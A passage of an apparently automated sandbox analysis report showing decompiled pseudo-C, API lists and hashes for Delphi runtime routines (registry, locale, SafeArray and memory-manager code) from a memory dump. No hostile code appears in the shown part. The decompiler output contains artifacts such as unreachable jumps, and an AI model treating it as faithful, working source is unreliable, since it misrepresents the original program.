				} else {
					_push(_t29);
					_push(E504835F9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x50483600);
					return RegCloseKey(_v8);
				}
			}












                                                                                                            0x50483589
                                                                                                            0x5048358b
                                                                                                            0x50483595
                                                                                                            0x504835b1
                                                                                                            0x50483600
                                                                                                            0x50483612
                                                                                                            0x50483615
                                                                                                            0x5048361e
                                                                                                            0x504835b3
                                                                                                            0x504835b5
                                                                                                            0x504835b6
                                                                                                            0x504835bb
                                                                                                            0x504835be
                                                                                                            0x504835c1
                                                                                                            0x504835dd
                                                                                                            0x504835e4
                                                                                                            0x504835e7
                                                                                                            0x504835ea
                                                                                                            0x504835f8
                                                                                                            0x504835f8

                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 504835AA
                                                                                                            • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,504835F9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 504835DD
                                                                                                            • RegCloseKey.ADVAPI32(?,50483600,00000000,?,00000004,00000000,504835F9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 504835F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                            • API String ID: 3677997916-4173385793
                                                                                                            • Opcode ID: d661619c3740e86d18e1d69a2613f419aefc3b37c1b6f8d63f0faa8ba55012b0
                                                                                                            • Instruction ID: c5f11bdaf89dad69fd7e83075b8c87d8c2fe506cdc93f2c4051ac4d3b046d442
                                                                                                            • Opcode Fuzzy Hash: d661619c3740e86d18e1d69a2613f419aefc3b37c1b6f8d63f0faa8ba55012b0
                                                                                                            • Instruction Fuzzy Hash: 71015E79900208BAE731DB94CD42FAA77ACDF58701F500AB6FA00E6A90F7785A10C798
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 5048A250, Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 64%
                                                                                                            			E5048A250(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x5048a2e7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E50489FC8(GetThreadLocale(), 0x5048a2fc, 0x100b,  &_v8);
				_t29 = E50487494(0x5048a2fc, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E5048A19C, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x50495768;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E5048A1D8, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E5048A2EE);
				return E50484278( &_v8);
			}










                                                                                                            0x5048a250
                                                                                                            0x5048a253
                                                                                                            0x5048a258
                                                                                                            0x5048a259
                                                                                                            0x5048a25e
                                                                                                            0x5048a261
                                                                                                            0x5048a277
                                                                                                            0x5048a289
                                                                                                            0x5048a293
                                                                                                            0x5048a2a3
                                                                                                            0x5048a2a8
                                                                                                            0x5048a2ad
                                                                                                            0x5048a2b2
                                                                                                            0x5048a2b2
                                                                                                            0x5048a2b8
                                                                                                            0x5048a2bb
                                                                                                            0x5048a2bb
                                                                                                            0x5048a2cc
                                                                                                            0x5048a2cc
                                                                                                            0x5048a2d3
                                                                                                            0x5048a2d6
                                                                                                            0x5048a2d9
                                                                                                            0x5048a2e6

                                                                                                            APIs
                                                                                                            • GetThreadLocale.KERNEL32(?,00000000,5048A2E7,?,?,00000000), ref: 5048A268
                                                                                                              • Part of subcall function 50489FC8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 50489FE6
                                                                                                            • GetThreadLocale.KERNEL32(00000000,00000004,00000000,5048A2E7,?,?,00000000), ref: 5048A298
                                                                                                            • EnumCalendarInfoA.KERNEL32(Function_0000A19C,00000000,00000000,00000004), ref: 5048A2A3
                                                                                                            • GetThreadLocale.KERNEL32(00000000,00000003,00000000,5048A2E7,?,?,00000000), ref: 5048A2C1
                                                                                                            • EnumCalendarInfoA.KERNEL32(Function_0000A1D8,00000000,00000000,00000003), ref: 5048A2CC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: Locale$InfoThread$CalendarEnum
                                                                                                            • String ID:
                                                                                                            • API String ID: 4102113445-0
                                                                                                            • Opcode ID: 3158e3dc15b7d01178455f6b69516e650161e9e085b21b44f888cb3b8b9c813d
                                                                                                            • Instruction ID: f7d949063879eaf79113b0d8821259723cac8f078f6e3ca02b3b3252773004fe
                                                                                                            • Opcode Fuzzy Hash: 3158e3dc15b7d01178455f6b69516e650161e9e085b21b44f888cb3b8b9c813d
                                                                                                            • Instruction Fuzzy Hash: 4601F2325011446BF362D6E48C16B5E725CDF52718FA00FA5F910EA7C2EA6E9E1083A4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 5048A300, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E5048A300(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x5048a4ca);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E50484278(__edx);
				E50489FC8(GetThreadLocale(), 0x5048a4e0, 0x1009,  &_v12);
				if(E50487494(0x5048a4e0, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E50484514(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x5049413c], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E50487978(_t124 + _t92 - 1, 2, 0x5048a4e4);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E50487978(_t124 + _t92 - 1, 4, 0x5048a4f4);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E50487978(_t124 + _t92 - 1, 2, 0x5048a50c);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E5048451C(_t122, 0x5048a524);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E50484460();
												E5048451C(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E5048451C(_t122, 0x5048a518);
										_t92 = _t92 + 1;
									}
								} else {
									E5048451C(_t122, 0x5048a504);
									_t92 = _t92 + 3;
								}
							} else {
								E5048451C(_t122, 0x5048a4f0);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E5048B28C(_t124, _t92);
							E5048476C(_t124, _v8, _t92,  &_v20);
							E5048451C(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x50495740; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E504842CC(_t122, _t124);
					} else {
						while(_t92 <= E50484514(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E50484460();
									E5048451C(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E5048A4D1);
				return E5048429C( &_v24, 4);
			}























                                                                                                            0x5048a300
                                                                                                            0x5048a305
                                                                                                            0x5048a306
                                                                                                            0x5048a307
                                                                                                            0x5048a308
                                                                                                            0x5048a309
                                                                                                            0x5048a30d
                                                                                                            0x5048a30f
                                                                                                            0x5048a313
                                                                                                            0x5048a314
                                                                                                            0x5048a319
                                                                                                            0x5048a31c
                                                                                                            0x5048a31f
                                                                                                            0x5048a326
                                                                                                            0x5048a33e
                                                                                                            0x5048a356
                                                                                                            0x5048a4a0
                                                                                                            0x5048a4a2
                                                                                                            0x5048a4a7
                                                                                                            0x5048a4a9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x5048a3bf
                                                                                                            0x5048a3c4
                                                                                                            0x5048a3cb
                                                                                                            0x5048a409
                                                                                                            0x5048a40e
                                                                                                            0x5048a410
                                                                                                            0x5048a42f
                                                                                                            0x5048a434
                                                                                                            0x5048a436
                                                                                                            0x5048a457
                                                                                                            0x5048a45c
                                                                                                            0x5048a45e
                                                                                                            0x5048a473
                                                                                                            0x5048a473
                                                                                                            0x5048a475
                                                                                                            0x5048a47b
                                                                                                            0x5048a482
                                                                                                            0x5048a477
                                                                                                            0x5048a477
                                                                                                            0x5048a479
                                                                                                            0x5048a490
                                                                                                            0x5048a49a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x5048a479
                                                                                                            0x5048a460
                                                                                                            0x5048a467
                                                                                                            0x5048a46c
                                                                                                            0x5048a46c
                                                                                                            0x5048a438
                                                                                                            0x5048a43f
                                                                                                            0x5048a444
                                                                                                            0x5048a444
                                                                                                            0x5048a412
                                                                                                            0x5048a419
                                                                                                            0x5048a41e
                                                                                                            0x5048a41e
                                                                                                            0x5048a49f
                                                                                                            0x5048a49f
                                                                                                            0x5048a3cd
                                                                                                            0x5048a3d6
                                                                                                            0x5048a3e4
                                                                                                            0x5048a3ee
                                                                                                            0x5048a3f3
                                                                                                            0x5048a3f3
                                                                                                            0x5048a3cb
                                                                                                            0x5048a35c
                                                                                                            0x5048a35c
                                                                                                            0x5048a361
                                                                                                            0x5048a364
                                                                                                            0x5048a372
                                                                                                            0x5048a36e
                                                                                                            0x5048a36e
                                                                                                            0x5048a36e
                                                                                                            0x5048a376
                                                                                                            0x5048a3b1
                                                                                                            0x5048a378
                                                                                                            0x5048a39d
                                                                                                            0x5048a37e
                                                                                                            0x5048a37e
                                                                                                            0x5048a380
                                                                                                            0x5048a382
                                                                                                            0x5048a384
                                                                                                            0x5048a38d
                                                                                                            0x5048a397
                                                                                                            0x5048a397
                                                                                                            0x5048a384
                                                                                                            0x5048a39c
                                                                                                            0x5048a39c
                                                                                                            0x5048a39c
                                                                                                            0x5048a3a8
                                                                                                            0x5048a376
                                                                                                            0x5048a4af
                                                                                                            0x5048a4b1
                                                                                                            0x5048a4b4
                                                                                                            0x5048a4b7
                                                                                                            0x5048a4c9

                                                                                                            APIs
                                                                                                            • GetThreadLocale.KERNEL32(?,00000000,5048A4CA,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5048A32F
                                                                                                              • Part of subcall function 50489FC8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 50489FE6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: Locale$InfoThread
                                                                                                            • String ID: eeee$ggg$yyyy
                                                                                                            • API String ID: 4232894706-1253427255
                                                                                                            • Opcode ID: cd32990e62f511b585966f8dcccf4116d6cc8c85435a39ca21d36fa90e8a3f10
                                                                                                            • Instruction ID: 0cabc237d6bbf9f9445ce8e8995a9d336403ba256bccc47acbcae01413ca5cf4
                                                                                                            • Opcode Fuzzy Hash: cd32990e62f511b585966f8dcccf4116d6cc8c85435a39ca21d36fa90e8a3f10
                                                                                                            • Instruction Fuzzy Hash: 244129367040045BEB02DAE4C8956AEF396DFD5508F244F2AEE41C7345E7FCED2286A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 5048BB4C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E5048BB4C() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x50494160 = _t1;
				}
				if( *0x50494160 == 0) {
					 *0x50494160 = E5048789C;
					return E5048789C;
				}
				return _t1;
			}





                                                                                                            0x5048bb52
                                                                                                            0x5048bb57
                                                                                                            0x5048bb5b
                                                                                                            0x5048bb63
                                                                                                            0x5048bb68
                                                                                                            0x5048bb68
                                                                                                            0x5048bb74
                                                                                                            0x5048bb7b
                                                                                                            0x00000000
                                                                                                            0x5048bb7b
                                                                                                            0x5048bb81

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,5048C541,00000000,5048C554), ref: 5048BB52
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 5048BB63
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                            • API String ID: 1646373207-3712701948
                                                                                                            • Opcode ID: 3e0de19aa70ff9abfd1e5d55f25c7dcee0a133c6e3b1fed7344e538f670a4709
                                                                                                            • Instruction ID: 0a890abc5fe2416ce8f084e628b4d58d64d75bc94a788b923af798065cf24daa
                                                                                                            • Opcode Fuzzy Hash: 3e0de19aa70ff9abfd1e5d55f25c7dcee0a133c6e3b1fed7344e538f670a4709
                                                                                                            • Instruction Fuzzy Hash: 36D09E6090120A5FD3919BE4AC99F072554AFB0169F400F3EE5415662BD76CDC4197D0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 5048D92C, Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E5048D92C(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E5048D80C(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L5048CA10();
							E5048D80C(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L5048CA18();
							E5048D80C(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E5048D8D0(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E5048D8A0(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L5048CA20();
						E5048D80C(_v780);
						E5048DB24(_v792);
					}
				}
				L15:
				_push(_v776);
				L5048C5AC();
				return E5048D80C(_v776);
			}






















                                                                                                            0x5048d938
                                                                                                            0x5048d948
                                                                                                            0x5048d94f
                                                                                                            0x5048d94f
                                                                                                            0x5048d95a
                                                                                                            0x5048d968
                                                                                                            0x5048d977
                                                                                                            0x5048d995
                                                                                                            0x5048d979
                                                                                                            0x5048d984
                                                                                                            0x5048d984
                                                                                                            0x5048d9a4
                                                                                                            0x5048d9b0
                                                                                                            0x5048d9b3
                                                                                                            0x5048d9b5
                                                                                                            0x5048d9b6
                                                                                                            0x5048d9b8
                                                                                                            0x5048d9be
                                                                                                            0x5048d9c0
                                                                                                            0x5048d9cf
                                                                                                            0x5048d9d0
                                                                                                            0x5048d9da
                                                                                                            0x5048d9db
                                                                                                            0x5048d9e0
                                                                                                            0x5048d9eb
                                                                                                            0x5048d9ec
                                                                                                            0x5048d9f6
                                                                                                            0x5048d9f7
                                                                                                            0x5048d9fc
                                                                                                            0x5048da17
                                                                                                            0x5048da19
                                                                                                            0x5048da1a
                                                                                                            0x5048da1d
                                                                                                            0x5048da1d
                                                                                                            0x5048d9be
                                                                                                            0x5048da26
                                                                                                            0x5048da29
                                                                                                            0x5048da2b
                                                                                                            0x5048da2c
                                                                                                            0x5048da32
                                                                                                            0x5048da38
                                                                                                            0x5048da3a
                                                                                                            0x5048da3c
                                                                                                            0x5048da3f
                                                                                                            0x5048da42
                                                                                                            0x5048da42
                                                                                                            0x5048da45
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x5048da45
                                                                                                            0x5048da45
                                                                                                            0x5048da4c
                                                                                                            0x5048da57
                                                                                                            0x5048da5f
                                                                                                            0x5048da66
                                                                                                            0x5048da6d
                                                                                                            0x5048da6e
                                                                                                            0x5048da73
                                                                                                            0x5048da7e
                                                                                                            0x5048da7e
                                                                                                            0x5048da8c
                                                                                                            0x5048da90
                                                                                                            0x5048da96
                                                                                                            0x5048da97
                                                                                                            0x5048daa7

                                                                                                            APIs
                                                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 5048D9DB
                                                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 5048D9F7
                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 5048DA6E
                                                                                                            • VariantClear.OLEAUT32(?), ref: 5048DA97
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                            • String ID:
                                                                                                            • API String ID: 920484758-0
                                                                                                            • Opcode ID: b7d79d7cc554195b75f8cb29a47ccce8732b24c3ac3028e6cdcbfa63f457c5b3
                                                                                                            • Instruction ID: ab00ce957f100719038dce37726eaf0fb472ecb4ee233fea653147fc661ff5c3
                                                                                                            • Opcode Fuzzy Hash: b7d79d7cc554195b75f8cb29a47ccce8732b24c3ac3028e6cdcbfa63f457c5b3
                                                                                                            • Instruction Fuzzy Hash: B0410075A0261D9FCB55EF58CC90BC9B3BCAF58214F1046EAE549E7311DA38AF808F94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 5048B57C, Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E5048B57C() {
				char* _v28;
				char _v156;
				short _v414;
				signed short _t16;
				signed int _t18;
				int _t20;
				void* _t22;
				void* _t25;
				int _t26;
				int _t30;
				signed int _t34;
				signed int _t35;
				signed int _t36;
				signed int _t41;
				int* _t43;
				short* _t44;
				void* _t52;

				 *0x5049573c = 0x409;
				 *0x50495740 = 9;
				 *0x50495744 = 1;
				_t16 = GetThreadLocale();
				if(_t16 != 0) {
					 *0x5049573c = _t16;
				}
				if(_t16 != 0) {
					 *0x50495740 = _t16 & 0x3ff;
					 *0x50495744 = (_t16 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x5049413c, 0x5048b6d4, 8 << 2);
				if( *0x504940f4 != 2) {
					_t18 = GetSystemMetrics(0x4a);
					__eflags = _t18;
					 *0x50495749 = _t18 & 0xffffff00 | _t18 != 0x00000000;
					_t20 = GetSystemMetrics(0x2a);
					__eflags = _t20;
					_t35 = _t34 & 0xffffff00 | _t20 != 0x00000000;
					 *0x50495748 = _t35;
					__eflags = _t35;
					if(__eflags != 0) {
						return E5048B504(__eflags, _t52);
					}
				} else {
					_t22 = E5048B564();
					if(_t22 != 0) {
						 *0x50495749 = 0;
						 *0x50495748 = 0;
						return _t22;
					}
					E5048B504(__eflags, _t52);
					_t41 = 0x20;
					_t25 = E50483250(0x5049413c, 0x20, 0x5048b6d4);
					_t36 = _t34 & 0xffffff00 | __eflags != 0x00000000;
					 *0x50495748 = _t36;
					__eflags = _t36;
					if(_t36 != 0) {
						 *0x50495749 = 0;
						return _t25;
					}
					_t26 = 0x80;
					_t43 =  &_v156;
					do {
						 *_t43 = _t26;
						_t26 = _t26 + 1;
						_t43 =  &(_t43[0]);
						__eflags = _t26 - 0x100;
					} while (_t26 != 0x100);
					_v28 =  &_v156;
					_t30 =  *0x5049573c; // 0x409
					GetStringTypeA(_t30, 2, _v28, 0x80,  &_v414);
					_t20 = 0x80;
					_t44 =  &_v414;
					while(1) {
						__eflags =  *_t44 - 2;
						_t41 = _t41 & 0xffffff00 |  *_t44 == 0x00000002;
						 *0x50495749 = _t41;
						__eflags = _t41;
						if(_t41 != 0) {
							goto L17;
						}
						_t44 = _t44 + 2;
						_t20 = _t20 - 1;
						__eflags = _t20;
						if(_t20 != 0) {
							continue;
						} else {
							return _t20;
						}
						L18:
					}
				}
				L17:
				return _t20;
				goto L18;
			}




















                                                                                                            0x5048b588
                                                                                                            0x5048b592
                                                                                                            0x5048b59c
                                                                                                            0x5048b5a6
                                                                                                            0x5048b5ad
                                                                                                            0x5048b5af
                                                                                                            0x5048b5af
                                                                                                            0x5048b5b7
                                                                                                            0x5048b5c3
                                                                                                            0x5048b5cf
                                                                                                            0x5048b5cf
                                                                                                            0x5048b5e3
                                                                                                            0x5048b5ec
                                                                                                            0x5048b6a1
                                                                                                            0x5048b6a6
                                                                                                            0x5048b6ab
                                                                                                            0x5048b6b2
                                                                                                            0x5048b6b7
                                                                                                            0x5048b6b9
                                                                                                            0x5048b6bc
                                                                                                            0x5048b6c2
                                                                                                            0x5048b6c4
                                                                                                            0x00000000
                                                                                                            0x5048b6cc
                                                                                                            0x5048b5f2
                                                                                                            0x5048b5f2
                                                                                                            0x5048b5f9
                                                                                                            0x5048b5fb
                                                                                                            0x5048b602
                                                                                                            0x00000000
                                                                                                            0x5048b602
                                                                                                            0x5048b60f
                                                                                                            0x5048b61f
                                                                                                            0x5048b621
                                                                                                            0x5048b626
                                                                                                            0x5048b629
                                                                                                            0x5048b62f
                                                                                                            0x5048b631
                                                                                                            0x5048b633
                                                                                                            0x00000000
                                                                                                            0x5048b633
                                                                                                            0x5048b63f
                                                                                                            0x5048b644
                                                                                                            0x5048b64a
                                                                                                            0x5048b64a
                                                                                                            0x5048b64c
                                                                                                            0x5048b64d
                                                                                                            0x5048b64e
                                                                                                            0x5048b64e
                                                                                                            0x5048b65b
                                                                                                            0x5048b670
                                                                                                            0x5048b676
                                                                                                            0x5048b67b
                                                                                                            0x5048b680
                                                                                                            0x5048b686
                                                                                                            0x5048b686
                                                                                                            0x5048b68a
                                                                                                            0x5048b68d
                                                                                                            0x5048b693
                                                                                                            0x5048b695
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x5048b697
                                                                                                            0x5048b69a
                                                                                                            0x5048b69a
                                                                                                            0x5048b69b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x5048b69b
                                                                                                            0x5048b686
                                                                                                            0x5048b6d3
                                                                                                            0x5048b6d3
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 5048B676
                                                                                                            • GetThreadLocale.KERNEL32 ref: 5048B5A6
                                                                                                              • Part of subcall function 5048B504: GetCPInfo.KERNEL32(00000000,?), ref: 5048B51D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocaleStringThreadType
                                                                                                            • String ID:
                                                                                                            • API String ID: 1505017576-0
                                                                                                            • Opcode ID: 5fb0e92bd92282d59bc73a31c16ae7ec5f25f1ced43d7b9f21f274e44eb6283d
                                                                                                            • Instruction ID: 127cc1f2f0ab0628df45a76d5883e7e9a58b13063acb668874fa4e793eabe1fc
                                                                                                            • Opcode Fuzzy Hash: 5fb0e92bd92282d59bc73a31c16ae7ec5f25f1ced43d7b9f21f274e44eb6283d
                                                                                                            • Instruction Fuzzy Hash: 42312521501285DED330CBA5AC517953B96DF21314F644AFFD9449B392EA3C4A4687D2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 50481B34, Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 68%
                                                                                                            			E50481B34() {
				intOrPtr* _v8;
				signed int _t19;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t34;

				_push(_t34);
				_push(E50481BFC);
				_push( *[fs:edx]);
				 *[fs:edx] = _t34;
				_push(0x504955c4);
				L5048130C();
				if( *0x50495045 != 0) {
					_push(0x504955c4);
					L50481314();
				}
				E504813B0(0x504955e4);
				E504813B0(0x504955f4);
				E504813B0(0x50495620);
				 *0x5049561c = LocalAlloc(0, 0xff8);
				if( *0x5049561c != 0) {
					_t19 = 3;
					do {
						_t29 =  *0x5049561c; // 0x81e6f0
						 *((intOrPtr*)(_t29 + _t19 * 4 - 0xc)) = 0;
						_t19 = _t19 + 1;
					} while (_t19 != 0x401);
					_v8 = 0x50495604;
					 *((intOrPtr*)(_v8 + 4)) = _v8;
					 *_v8 = _v8;
					 *0x50495610 = _v8;
					 *0x504955bc = 1;
				}
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E50481C03);
				if( *0x50495045 != 0) {
					_push(0x504955c4);
					L5048131C();
					return 0;
				}
				return 0;
			}








                                                                                                            0x50481b3a
                                                                                                            0x50481b3b
                                                                                                            0x50481b40
                                                                                                            0x50481b43
                                                                                                            0x50481b46
                                                                                                            0x50481b4b
                                                                                                            0x50481b57
                                                                                                            0x50481b59
                                                                                                            0x50481b5e
                                                                                                            0x50481b5e
                                                                                                            0x50481b68
                                                                                                            0x50481b72
                                                                                                            0x50481b7c
                                                                                                            0x50481b8d
                                                                                                            0x50481b99
                                                                                                            0x50481b9b
                                                                                                            0x50481ba0
                                                                                                            0x50481ba0
                                                                                                            0x50481ba8
                                                                                                            0x50481bac
                                                                                                            0x50481bad
                                                                                                            0x50481bb4
                                                                                                            0x50481bc1
                                                                                                            0x50481bca
                                                                                                            0x50481bcf
                                                                                                            0x50481bd4
                                                                                                            0x50481bd4
                                                                                                            0x50481bdd
                                                                                                            0x50481be0
                                                                                                            0x50481be3
                                                                                                            0x50481bef
                                                                                                            0x50481bf1
                                                                                                            0x50481bf6
                                                                                                            0x00000000
                                                                                                            0x50481bf6
                                                                                                            0x50481bfb

                                                                                                            APIs
                                                                                                            • RtlInitializeCriticalSection.KERNEL32(504955C4,00000000,50481BFC,?,?,?,5048255A,?), ref: 50481B4B
                                                                                                            • RtlEnterCriticalSection.KERNEL32(504955C4,504955C4,00000000,50481BFC,?,?,?,5048255A,?), ref: 50481B5E
                                                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,504955C4,00000000,50481BFC,?,?,?,5048255A,?), ref: 50481B88
                                                                                                            • RtlLeaveCriticalSection.KERNEL32(504955C4,50481C03,00000000,50481BFC,?,?,?,5048255A,?), ref: 50481BF6
                                                                                                            Memory Dump Source
